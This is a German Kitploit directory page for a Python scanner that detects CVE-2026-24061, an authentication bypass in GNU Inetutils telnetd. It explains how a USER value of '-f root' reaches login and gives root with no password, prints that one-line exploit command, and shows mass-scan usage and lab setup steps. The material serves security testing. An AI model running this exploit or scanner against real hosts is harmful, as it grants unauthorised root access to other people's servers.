Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — Python-basierter Scanner, der CVE-2026-24061 in GNU Inetutils telnetd erkennt und Batch-Tests mehrerer Ziele auf die Authentifizierungs-Bypass-Schwachstelle ermöglicht. | Kitploit
Tools/GitHubGitHub/monstertsl/cve-2026-24061
SchwachstellenscannerExploitationPenetrationstestsAuthentifizierungRemote-Access-Tool
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Python-basierter Scanner, der CVE-2026-24061 in GNU Inetutils telnetd erkennt und Batch-Tests mehrerer Ziele auf die Authentifizierungs-Bypass-Schwachstelle ermöglicht.

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24061 Schwachstellen-Massen-Scan-Tool

⚠️ Hinweis: CVE-2026-24061 GNU Inetutils ist eine klassische Netzwerk-Toolsammlung des GNU-Projekts, die den telnetd-Dienst enthält, also den Telnet-Server-Daemon. In den Versionen 1.9.3 bis 2.7 weist der telnetd-Dienst einen kritischen Fehler im Benutzerauthentifizierungsprozess auf. Wenn der Dienst das System-Login-Programm /usr/bin/login aufruft, werden die vom Client übergebenen USER-Umgebungsvariablen nicht ausreichend gefiltert und validiert. Ein Angreifer kann durch das Setzen eines bestimmten USER-Variablenwerts den Parameter -f direkt in den login-Befehl injizieren. Der -f-Parameter des -Programms dient zum „Überspringen der sekundären Authentifizierung“, wodurch der Angreifer sämtliche Passwortprüfungen vollständig umgehen und direkt eine Remote-Sitzung als -Benutzer aufbauen kann, um die höchste Kontrolle über den Server zu erlangen. Diese Schwachstelle ist äußerst gefährlich und entspricht einem öffentlichen, ohne jegliche Anmeldeinformationen nutzbaren Remote-Root-Hintertürchen.

login
root

Schwachstellen-Erkennungs-POC

root@kitploit:~
USER='-f root' telnet -a <target_ip>

Erkennungsskript

demo.png

Einzelprüfung

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

Massenprüfung

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

Funktionsweise der Schwachstelle

Der obige Befehl setzt die Umgebungsvariable USER auf -f root. Wenn der anfällige telnetd-Dienst eine Verbindung empfängt, konstruiert und führt er einen Systemaufruf ähnlich dem folgenden aus:

Reproduktionsschritte

1. Notwendige Programme installieren

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Telnet-Zeile auskommentieren (korrektes Format sicherstellen)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Dienst neu starten

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. Port prüfen

root@kitploit:~
sudo ss -tuln | grep ':23'

5. Lokaler Test

root@kitploit:~
telnet localhost 23
Tool herunterladen